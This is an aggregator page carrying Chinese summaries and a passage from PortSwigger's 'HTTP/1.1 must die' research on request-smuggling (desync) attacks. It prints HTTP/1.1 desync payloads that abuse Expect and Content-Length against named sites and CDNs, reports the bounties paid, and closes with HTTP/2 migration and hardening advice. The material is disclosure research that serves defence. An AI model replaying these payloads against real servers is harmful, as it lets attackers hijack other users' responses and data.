HTTP/1.1 必须消亡:去同步的终局
HTTP/1.1 must die: the desync endgame

原始链接: https://portswigger.net/research/http1-must-die

该研究详细描述了一系列成功的HTTP/1.1去同步攻击,作者因此获得了超过35万美元的漏洞赏金。核心漏洞在于HTTP/1.1有缺陷的请求分离机制,允许攻击者操纵服务器响应,并可能访问敏感数据——例如其他用户的漏洞报告(GitLab,7000美元)或劫持整个CDN的响应(Netlify,Akamai)。 利用混淆的“Expect”头部被证明特别有效,导致响应队列中毒(RQP)和Content-Length (CL)去同步。一项重要发现涉及Akamai,影响了众多网站,包括LastPass(5000美元赏金)甚至可能包括example.com。报告Akamai漏洞获得了9000美元的赏金和CVE-2025-32094,但广泛的影响造成了巨大的压力和支持问题。 作者认为,修补HTTP/1.1是不够的,因为它本身就存在复杂性。最终的解决方案是迁移到HTTP/2,这是一种二进制协议,不易受到这些攻击。该研究敦促更广泛地采用HTTP/2,并鼓励安全研究人员积极识别和报告HTTP/1.1漏洞,以加速其淘汰。

## HTTP/1.1 漏洞与对 HTTP/2 的推动 一篇近期文章认为,HTTP/1.1 固有的设计缺陷使其需要被取代,并引用了影响 Fastly 和 Mozilla 等大型科技公司的持续请求走私漏洞。核心问题在于模糊的解析规则,允许恶意行为者利用前端和后端服务器之间的一致性差异。 虽然 HTTP/2 被提议作为解决方案,但讨论显示出对其复杂性和实施挑战的担忧。 许多评论员指出,即使在 Python 和 Go 等语言中,创建稳定的 HTTP/2 服务器和客户端也存在困难。 一些人建议简化版的“HTTP/2-Lite”配置可以缓解这些问题。 然而,许多人认为问题不在于协议本身,而在于粗心的工程设计。 他们认为,更好的解析器实现,而不是协议转换,才是关键。 此外,人们还担心放弃 HTTP/1.1 会不成比例地影响较小、较简单的网站设置,并可能牺牲可读性和可访问性。 最终,争论的中心在于,复杂的协议升级是否是最佳方法,还是专注于对现有标准的稳健实施更有效。
相关文章

原文
-mobile.com Expect: 100-continue Content-Length: 291 GET /logout HTTP/1.1 Host: <redacted>.t-mobile.com Content-Length: 100 GET / HTTP/1.1 Host: <redacted>.t-mobile.com GET https://psres.net/assets HTTP/1.1 X: y GET / HTTP/1.1 Host: <redacted>.t-mobile.com

T-Mobile awarded us $12,000 for this finding - a highly competitive payout for a non-production domain.

0.CL desync via obfuscated Expect - Gitlab

Sending a lightly obfuscated Expect header exposes a substantial number of new targets. For example, "Expect: y 100-continue" causes a 0.CL desync on h1.sec.gitlab.net. This was an interesting target as it holds the attachments to reports sent to Gitlab's bug bounty program - potentially critical zerodays.

The site had a tiny attack surface so we weren't able to find a classic redirect or XSS desync gadget for exploitation. Instead, we opted to shoot for Response Queue Poisoning (RQP) - a high-impact attack which results in the server sending everyone random responses intended for other users. RQP is tricky on low-traffic targets due to an inherent race condition, but we persisted and 27,000 requests later we got access to someone else's vulnerability report video and a $7,000 bounty:

GET / HTTP/1.1 Content-Length: 686 Expect: y 100-continue GET / HTTP/1.1 Content-Length: 292 GET / HTTP/1.1 Host: h1.sec.gitlab.net GET / HTTP/1.1 Host: h1.sec.gitlab.net GET /??? HTTP/1.1 Authorization: ??? User-Agent: Unknown Gitlab employee GET / HTTP/1.1 Host: h1.sec.gitlab.net

After this, some high-end payouts took us to around $95,000 earned from 0.CL Expect-based desync attacks.

CL.0 desync via vanilla Expect - Netlify CDN

Proving that it can break servers in every possible way, Expect can also cause CL.0 desync vulnerabilities.

For example, we found a CL.0 RQP vulnerability in Netlify that, when triggered, send us a continuous stream of responses from every website on the Netlify CDN:

POST /images/ HTTP/1.1 Host: <redacted-netlify-client> Expect: 100-continue Content-Length: 64 GET /letter-picker HTTP/1.1 Host: <redacted-netlify-client> POST /authenticate HTTP/1.1 Host: ??? User-Agent: Unknown Netlify user GET / HTTP/1.1 Host: <redacted-netlify-client>

We found this while testing a particular Netlify-hosted website, but it didn't make sense to report it to them as the responses we hijacked were all coming from third-party websites.

The attack stopped working shortly after we found it, but we reported it to Netlify anyway and received the reply "Websites utilizing Netlify are out of scope", and no bounty. Normally, when I encounter a surprising bounty outcome, I don’t mention it as it tends to distract readers from the technical content. I’ve made an exception here because it provides useful context for what happened next.

CL.0 desync via obfuscated Expect - Akamai CDN

Unsurprisingly, obfuscating the Expect header revealed even more CL.0 desync vulnerabilities. Here's an example we found that let us serve arbitrary content to users accessing auth.lastpass.com, netting their maximum bounty - $5,000:

OPTIONS /anything HTTP/1.1 Host: auth.lastpass.com Expect: 100-continue Content-Length: 39 GET / HTTP/1.1 Host: www.sky.com X: X GET /anything HTTP/1.1 Host: auth.lastpass.com

We quickly realised this affected a large number of targets using the Akamai CDN. In fact, I believe we could have used it to take control of possibly the most prestigious domain on the internet - example.com! Unfortunately, example.com doesn't have a VDP, so validating this would have been illegal. Unless Akamai informs us, we'll probably never know for certain.

Still, this raised a question. Should we report the issue directly to affected companies, or to Akamai? As a researcher, maintaining a good relationship with both CDNs and their customers is really important, and any bounties I earn go to charity so I don't have a personal stake. However, I could see that the bounty hunters would have discovered the issue independently without my help, and didn't want to sabotage their income. Ultimately, I decided to step back - I didn't get involved in exploring or reporting the issue, and didn't take a cut of the bounties. Part of me regrets this a little because it ultimately resulted in 74 separate bounties, totalling $221,000.

The reports were well received, but things didn't go entirely smoothly. It transpired that the vulnerability was actually fully inside Akamai's infrastructure, so Akamai was inundated with support tickets from their clients. I became concerned that the technique might leak while Akamai was still vulnerable, and reached out to Akamai to help them fix it faster. The issue was assigned CVE-2025-32094, and I was awarded a $9,000 bounty. They were able to release a hotfix for some customers quickly, but it still took 65 days from that point to fully resolve the vulnerability.

Overall, it was quite stressful, but at least I got some USD-backed evidence of the danger posed by HTTP/1.1. The total bounties earned from this research so far currently stands at slightly over $350,000.

Why patching HTTP/1.1 is not enough

All the attacks in this paper are exploiting implementation flaws, so it might seem strange to conclude that the solution is to abandon the entire protocol. However, all these attacks have the same root cause. HTTP/1.1's fatal flaw - poor request separation - means tiny bugs often have critical impact. This is compounded by two key factors.

First, HTTP/1.1 is only simple if you're not proxying. The RFC contains numerous landmines like the three different ways of specifying the length of a message, complexity bombs like Expect and Connection, and special-cases like HEAD. These all interact with each-other, and parser discrepancies, to create countless critical vulnerabilities.

Second, the last six years have proven that we struggle to apply the types of patching and hardening that would truly resolve the threat. Applying robust validation or normalisation on front-end servers would help, but we're too afraid of breaking compatibility with legacy clients to do this. Instead, we resort to regex-based defences, which attackers can easily bypass.

All these factors combine to mean one thing - more desync attacks are coming.

How secure is HTTP/2 compared to HTTP/1?

HTTP/2 is not perfect - it's significantly more complex than HTTP/1, and can be painful to implement. However, upstream HTTP/2+ makes desync vulnerabilities vastly less likely. This is because HTTP/2 is a binary protocol, much like TCP and TLS, with zero ambiguity about the length of each message. You can expect implementation bugs, but the probability that a given bug is actually exploitable is significantly lower.

Most vulnerabilities found in HTTP/2 implementations to date are DoS flaws such as HTTP/2 Rapid Reset - an attack class that HTTP/1 has its fair share of. For a more serious vulnerability, you would typically need a memory safety issue or integer overflow as a root cause. Once again, these issues affect HTTP/1.1 implementations too. Of course, there's always exceptions - like CVE-2023-32731 and HTTP/3 connection contamination - and I look forward to seeing more research targeting these in the future.

Note that HTTP/2 downgrading, where front-end servers speak HTTP/2 with clients but rewrite it as HTTP/1.1 for upstream communication, provides minimal security benefit and actually makes websites more exposed to desync attacks.

You might encounter an argument stating that HTTP/1.1 is more secure than HTTP/2 because HTTP/1.1 implementations are older, and therefore more hardened. To counter this, I would like to draw a comparison between request smuggling, and buffer overflows. Request smuggling has been a well known threat for roughly six years. This means our defences against it are roughly as mature as our defences against buffer overflows were in 2002. It's time to switch to a memory safe language.

How to defeat request smuggling with HTTP/2

First, ensure your origin server supports HTTP/2. Most modern servers do, so this shouldn't be a problem.

Next, toggle upstream HTTP/2 on your proxies. I've confirmed this is possible on the following vendors: HAProxy, F5 Big-IP, Google Cloud, Imperva, Apache (experimental), and Cloudflare (but they use HTTP/1 internally).

Unfortunately, the following vendors have not yet added support for upstream HTTP/2: nginx, Akamai, CloudFront, Fastly. Try raising a support ticket asking when they'll enable upstream HTTP/2 - hopefully they can at least provide a timeline. Also, have a look through their documentation to see if you can enable request normalisation - sometimes valuable mitigations are available but disabled by default.

Note that disabling HTTP/1 between the browser and the front-end is not required. These connections are rarely shared between different users and, as a result, they're significantly less dangerous. Just ensure they're converted to HTTP/2 upstream.

How to survive with HTTP/1.1

If you're currently stuck with upstream HTTP/1.1, there are some strategies you can use to try and help your website survive the inevitable future rounds of desync attacks until you can start using HTTP/2.

  • Enable all available normalization and validation options on the front-end server
  • Enable validation options on the back-end server
  • Avoid niche webservers - Apache and nginx are lower-risk
  • Perform regular scans with HTTP Request Smuggler
  • Disable upstream connection reuse (may impact performance)
  • Reject requests that have a body, if the method doesn't require one to be present (GET/HEAD/OPTIONS)

Finally, please be wary of vendor claims that WAFs can thwart desync attacks as effectively as upstream HTTP/2.

How you can help kill HTTP/1.1

Right now, the biggest barrier to killing upstream HTTP/1 is poor awareness of how dangerous it is. Hopefully this research will help a bit, but to make a lasting difference and ensure we're not in exactly the same place in six years time, I need your help.

We need to collectively show the world how broken HTTP/1.1 is. Take HTTP Request Smuggler 3.0 for a spin, hack systems and get them patched with HTTP/2. Whenever possible, publish your findings so the rest of us can learn from it. Don't let targets escape you just by patching the methodology - adapt and customise techniques and tools, and never settle for the state of the art. It's not as hard as you think, and you definitely don't need years of research experience. For example, while wrapping this research up I realised a writeup published last year actually describes an Expect-based 0.CL desync, so you could have beaten me to these findings just by reading and applying that!

Finally, share the message - more desync attacks are always coming.

Over the last six years, we've seen that a design flaw in HTTP/1.1 regularly exposes websites to critical attacks. Attempts to hotfix individual implementations have failed to keep pace with the threat, and the only viable long-term solution is upstream HTTP/2. This is not a quick fix, but by spreading awareness just how dangerous upstream HTTP/1.1 really is, we can help kill HTTP/1.1.

Good luck!

James Kettle

Back to all articles

Related Research

联系我们 contact @ memedata.com